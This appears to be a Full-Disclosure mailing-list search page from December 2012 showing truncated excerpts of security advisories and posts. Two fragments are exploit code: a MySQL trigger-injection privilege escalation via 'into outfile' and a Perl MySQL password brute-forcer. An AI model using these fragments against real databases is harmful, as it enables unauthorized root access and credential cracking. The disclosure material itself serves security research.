Maybe read the code???
$mysql_version = 51; # can be 51 or 50
if ($mysql_version eq 50) {
$inject =
select 'TYPE=TRIGGERS' into outfile'.$folder.$database./rootme.TRG'
LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost`
trigger atk after insert on rootme for each rownbegin
After reading l0rd lunatic's post about the Buffalo router
(http://seclists.org/fulldisclosure/2012/Nov/234), noticed that going
to login page and clicking 'help' will show you the default admin
account. I think that is what he meant about information disclosure!
It also lets you login as guest
Release Date. 5-Dec-2012
Last Update. -
Vendor Notification Date. -
Product. Linkstation Others
Platform. Buffalo Technology
Affected versions. Including Actual Version
Severity Rating. High
Impact.
Hi all,
wrote some shitcode for mysql userhash enumeration when having FILE
privilege. surely you could do it with simple bash one-liner using
mysql+grep+sed, but we're not going the easy way, right?
the first thought was hey, what about changing root password directly
in file user.MYD? but
Hello,
This year there is an advent calendar aimed at security -
http://secadvent.com
Every day for the period Dec 1 -25 a security related article will be
published on the website.
Today's article is a crypto type puzzle.
Best of luck from the Security Advent Calendar
Product: FOOT Gestion
Version: -
Vendor: Winsoft
Vendor site: http://www.footgestion.ch
Status: fixed
Level: High
=
Description
=
FOOT Gestion is a soccer team management CMS. The solution is based on a
software and a CMS website.
The website module is affected by a SQL injection
On Dec 5, 2012 11:09 a.m., Paul van Bavel pvanba...@gmail.com wrote:
Where can I find the mysqlcrack.pl script.
Regards,
Paul
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
___
Mandriva Linux Security Advisory MDVSA-2012:177
http://www.mandriva.com/security/
CA20121205-01: Security Notice for CA XCOM Data Transport on Unix and
Linux
Issued: December 5, 2012
CA Technologies Support is alerting customers to a potential risk with
CA XCOM Data Transport. A vulnerability exists that can allow a remote
attacker to
View online: http://drupal.org/node/1859282
* Advisory ID: DRUPAL-SA-CONTRIB-2012-173
* Project: Nodewords: D6 Meta Tags [1] (third-party module)
* Version: 6.x
* Date: 2012-December-05
* Security risk: Not critical [2]
* Exploitable from: Remote
* Vulnerability: Information
On Mon, Dec 3, 2012 at 11:03 AM, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
Yes I agree, we should discard this default remote vulnerability
because it is documented.
Devil's advocate: Does a questionable design choice/feature that is
documented make it any less vulnerable?
How
12 matches